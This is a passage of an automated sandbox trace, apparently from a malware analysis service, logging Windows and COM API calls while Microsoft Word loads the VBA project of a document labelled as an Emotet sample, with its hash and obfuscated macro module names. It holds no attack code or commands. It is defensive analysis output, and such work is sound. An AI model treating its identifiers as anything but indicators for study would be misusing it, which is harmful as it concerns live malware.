[6]=0x1, [7]=0xd2)), ppvObject=0x147410 | out: ppvObject=0x147410*=0x0) returned 0x80004002 [0068.043] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473e0 | out: ppvObject=0x1473e0*=0x0) returned 0x80004002 [0068.044] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473d0 | out: ppvObject=0x1473d0*=0x0) returned 0x80004002 [0068.044] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473d8 | out: ppvObject=0x1473d8*=0x0) returned 0x80004002 [0068.044] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c8c0, ppTypeAttr=0x147408, pDummy=0x10 | out: ppTypeAttr=0x147408, pDummy=0x10) returned 0x0 [0068.044] ITypeInfo:LocalReleaseTypeAttr (This=0x695c8c0) returned 0x0 [0068.044] IUnknown:AddRef (This=0x695c8c0) returned 0x2 [0068.044] IUnknown:Release (This=0x695c970) returned 0x1 [0068.044] IUnknown:Release (This=0x695ca20) returned 0x1 [0068.044] wcsncpy_s (in: _Destination=0x147110, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.044] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x147040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.044] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.044] CExposedDocFile::CreateStream () returned 0x0 [0068.044] IMalloc:Alloc (This=0x7fefec05380, cb=0x420) returned 0x69fa1d0 [0068.044] CExposedStream::AddRef () returned 0x2 [0068.044] CExposedStream::Release () returned 0x1 [0068.044] CExposedStream::Release () returned 0x0 [0068.044] IMalloc:Free (This=0x7fefec05380, pv=0x69fa1d0) [0068.044] CExposedDocFile::AddRef () returned 0x3 [0068.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1479d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0068.048] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x147a78*=0x0 | out: pptlib=0x147a78*=0x665b4b0) returned 0x0 [0068.049] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x147708*=0x0 | out: pptlib=0x147708*=0x665b4b0) returned 0x0 [0068.049] ITypeLib:RemoteGetDocumentation (in: This=0x665b4b0, index=-1, refPtrFlags=0x147728, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x147610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0068.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0068.049] IUnknown:QueryInterface (in: This=0x665b4b0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1475e8 | out: ppvObject=0x1475e8*=0x0) returned 0x80004002 [0068.049] GetLocalTime (in: lpSystemTime=0x147490 | out: lpSystemTime=0x147490*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xe1)) [0068.049] wcsncpy_s (in: _Destination=0x147140, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.049] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x147070, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.049] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.049] GetLocalTime (in: lpSystemTime=0x147330 | out: lpSystemTime=0x147330*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xe1)) [0068.049] wcsncpy_s (in: _Destination=0x146fe0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0068.049] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0068.050] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0xaf54180 [0068.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0xaf54180, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0068.050] IMalloc:Free (This=0x7fefec05380, pv=0xaf54180) [0068.050] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0068.050] IUnknown:QueryInterface (in: This=0x665b4b0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147518 | out: ppvObject=0x147518*=0x0) returned 0x80004002 [0068.050] ITypeLib:RemoteGetLibAttr (in: This=0x665b4b0, ppTLibAttr=0x147510, pDummy=0x10 | out: ppTLibAttr=0x147510, pDummy=0x10) returned 0x0 [0068.050] ITypeLib:RemoteGetDocumentation (in: This=0x665b4b0, index=-1, refPtrFlags=0x0, pbstrName=0x147508, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x147508*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0068.050] StringFromGUID2 (in: rguid=0x6885c90*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x147530, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0068.050] _ultow_s (in: _Value=0x2, _Buffer=0x14747a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0068.050] _ultow_s (in: _Value=0x8, _Buffer=0x14747e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0068.050] _ultow_s (in: _Value=0x0, _Buffer=0x147482, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0068.050] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0068.050] wcscpy_s (in: _Destination=0x429ce8e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0068.050] wcscpy_s (in: _Destination=0x429ceda, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0068.050] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0068.050] wcscpy_s (in: _Destination=0x429cf68, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0068.050] ITypeLib:LocalReleaseTLibAttr (This=0x665b4b0) returned 0x0 [0068.050] wcscpy_s (in: _Destination=0xafd3ee8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0068.050] ITypeLib:RemoteGetDocumentation (in: This=0x665b4b0, index=-1, refPtrFlags=0x147628, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0068.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0068.050] strcpy_s (in: _Dst=0x147420, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0068.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x147420, cbMultiByte=7, lpWideCharStr=0x147270, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0068.051] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.051] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Office", lHashVal=0x107515, pfName=0x147340, pBstrLibName=0x147270 | out: pfName=0x147340*=0, pBstrLibName=0x147270) returned 0x0 [0068.051] IUnknown:Release (This=0x665ba50) returned 0x3 [0068.051] IUnknown:AddRef (This=0x631b4c0) returned 0x8 [0068.051] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Office", lHashVal=0x107515, pfName=0x147340, pBstrLibName=0x147270 | out: pfName=0x147340*=0, pBstrLibName=0x147270) returned 0x0 [0068.051] IUnknown:Release (This=0x631b4c0) returned 0x7 [0068.051] IUnknown:AddRef (This=0x665bd20) returned 0x5 [0068.051] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Office", lHashVal=0x107515, pfName=0x147340, pBstrLibName=0x147270 | out: pfName=0x147340*=0, pBstrLibName=0x147270) returned 0x0 [0068.051] IUnknown:Release (This=0x665bd20) returned 0x4 [0068.051] IMalloc:Alloc (This=0x7fefec05380, cb=0x3c) returned 0x68e0440 [0068.051] IMalloc:Free (This=0x7fefec05380, pv=0x694ffc0) [0068.051] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682eb20 [0068.051] IMalloc:Realloc (This=0x7fefec05380, pv=0x682eb20, cb=0x68) returned 0x694ffc0 [0068.051] IMalloc:Free (This=0x7fefec05380, pv=0x68e0440) [0068.051] wcsncpy_s (in: _Destination=0x147220, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0068.051] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0068.051] IMalloc:Alloc (This=0x7fefec05380, cb=0x12a) returned 0xaf094e0 [0068.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0xaf094e0, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0068.051] IMalloc:Free (This=0x7fefec05380, pv=0xaf094e0) [0068.051] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0068.051] wcsncpy_s (in: _Destination=0x147220, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.051] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x147150, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.051] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.051] IUnknown:AddRef (This=0x665b4b0) returned 0x4 [0068.051] IUnknown:QueryInterface (in: This=0x665b4b0, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147648 | out: ppvObject=0x147648*=0x0) returned 0x80004002 [0068.052] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0068.052] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0068.052] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=7, lpWideCharStr=0x6884528, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.052] IMalloc:Alloc (This=0x7fefec05380, cb=0xa8) returned 0xaf5e5b0 [0068.052] IMalloc:Alloc (This=0x7fefec05380, cb=0x7f40) returned 0xafadb20 [0068.052] IMalloc:Alloc (This=0x7fefec05380, cb=0x30) returned 0x646fa70 [0068.052] IMalloc:Alloc (This=0x7fefec05380, cb=0x60) returned 0x69500a0 [0068.053] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x147938, pDummy=0xafd5310 | out: ppTypeAttr=0x147938, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.053] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0068.053] IUnknown:Release (This=0x695ca20) returned 0x1 [0068.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cU1A41_", cchWideChar=8, lpMultiByteStr=0x1478c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cU1A41_", lpUsedDefaultChar=0x0) returned 8 [0068.055] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0068.055] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="cU1A41_") returned 0x1062dc [0068.055] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2c60 [0068.055] qsort (in: _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c | out: _Base=0x67c2c60) [0068.055] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="iAAB4Dx", cchCount1=-1, lpString2="cU1A41_", cchCount2=-1) returned 3 [0068.056] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GB_C_A", cchCount1=-1, lpString2="iAAB4Dx", cchCount2=-1) returned 1 [0068.056] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GB_C_A", cchCount1=-1, lpString2="cU1A41_", cchCount2=-1) returned 3 [0068.056] bsearch (_Key=0x1467f8, _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c) returned 0x67c2c60 [0068.056] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="cU1A41_", cchCount1=-1, lpString2="GB_C_A", cchCount2=-1) returned 1 [0068.056] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="cU1A41_", cchCount1=-1, lpString2="cU1A41_", cchCount2=-1) returned 2 [0068.056] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.057] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x1478d8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601) returned 0x0 [0068.057] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0068.057] IUnknown:Release (This=0x665ba50) returned 0x3 [0068.057] IUnknown:AddRef (This=0x631b4c0) returned 0x8 [0068.057] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1478d8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601) returned 0x0 [0068.057] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0068.057] IUnknown:Release (This=0x631b4c0) returned 0x7 [0068.057] IUnknown:AddRef (This=0x665bd20) returned 0x5 [0068.057] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x1478d8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147601) returned 0x0 [0068.057] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0068.057] IUnknown:Release (This=0x665bd20) returned 0x4 [0068.057] wcscpy_s (in: _Destination=0x682eb28, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0068.057] wcsncpy_s (in: _Destination=0x1471f0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.057] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x147120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.057] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.057] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0068.057] SysStringByteLen (bstr="潎浲污") returned 0x6 [0068.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=7, lpWideCharStr=0x6884528, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0068.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.060] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473e0 | out: ppvObject=0x1473e0*=0x0) returned 0x80004002 [0068.060] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473b0 | out: ppvObject=0x1473b0*=0x0) returned 0x80004002 [0068.060] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473a0 | out: ppvObject=0x1473a0*=0x0) returned 0x80004002 [0068.060] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1473a8 | out: ppvObject=0x1473a8*=0x0) returned 0x80004002 [0068.060] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x1473d8, pDummy=0x10 | out: ppTypeAttr=0x1473d8, pDummy=0x10) returned 0x0 [0068.060] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0068.060] IUnknown:AddRef (This=0x695ca20) returned 0x3 [0068.060] IUnknown:Release (This=0x695ca20) returned 0x2 [0068.062] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0068.062] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=8, lpWideCharStr=0x6884528, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0068.062] malloc (_Size=0xbb) returned 0x251c9f0 [0068.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003", cchWideChar=-1, lpMultiByteStr=0x251c9f0, cbMultiByte=187, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003", lpUsedDefaultChar=0x0) returned 94 [0068.062] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0068.062] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0068.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x682eb28, cbMultiByte=8, lpWideCharStr=0x6885c98, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0068.062] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0068.062] strncat_s (in: _Destination="Project (", _SizeInBytes=0x187, _Source="Emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003", _MaxCount=0x28 | out: _Destination="Project (Emotet_e2_2d2fa29185ad0f48f665f9c93cc828") returned 0x0 [0068.062] lstrcatA (in: lpString1="Project (Emotet_e2_2d2fa29185ad0f48f665f9c93cc828", lpString2="...)" | out: lpString1="Project (Emotet_e2_2d2fa29185ad0f48f665f9c93cc828...)") returned="Project (Emotet_e2_2d2fa29185ad0f48f665f9c93cc828...)" [0068.062] IMalloc:Alloc (This=0x7fefec05380, cb=0xa8) returned 0xaf5e710 [0068.062] IMalloc:Alloc (This=0x7fefec05380, cb=0x30) returned 0x646f6b0 [0068.062] IMalloc:Alloc (This=0x7fefec05380, cb=0x60) returned 0x6950180 [0068.064] IMalloc:Alloc (This=0x7fefec05380, cb=0xa8) returned 0xaf5e7c0 [0068.064] IMalloc:Alloc (This=0x7fefec05380, cb=0x30) returned 0x646f8b0 [0068.064] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x1477c8, pDummy=0xafd5310 | out: ppTypeAttr=0x1477c8, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.064] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0068.064] IUnknown:Release (This=0x695ca20) returned 0x2 [0068.064] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x147a08, pDummy=0xaf3dd60 | out: ppTypeAttr=0x147a08, pDummy=0xaf3dd60*=0x17) returned 0x0 [0068.064] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0068.064] IUnknown:Release (This=0x695ca20) returned 0x2 [0068.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iAAB4Dx", cchWideChar=8, lpMultiByteStr=0x147860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iAAB4Dx", lpUsedDefaultChar=0x0) returned 8 [0068.065] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0068.065] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0068.065] bsearch (_Key=0x146798, _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c) returned 0x67c2c70 [0068.065] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, 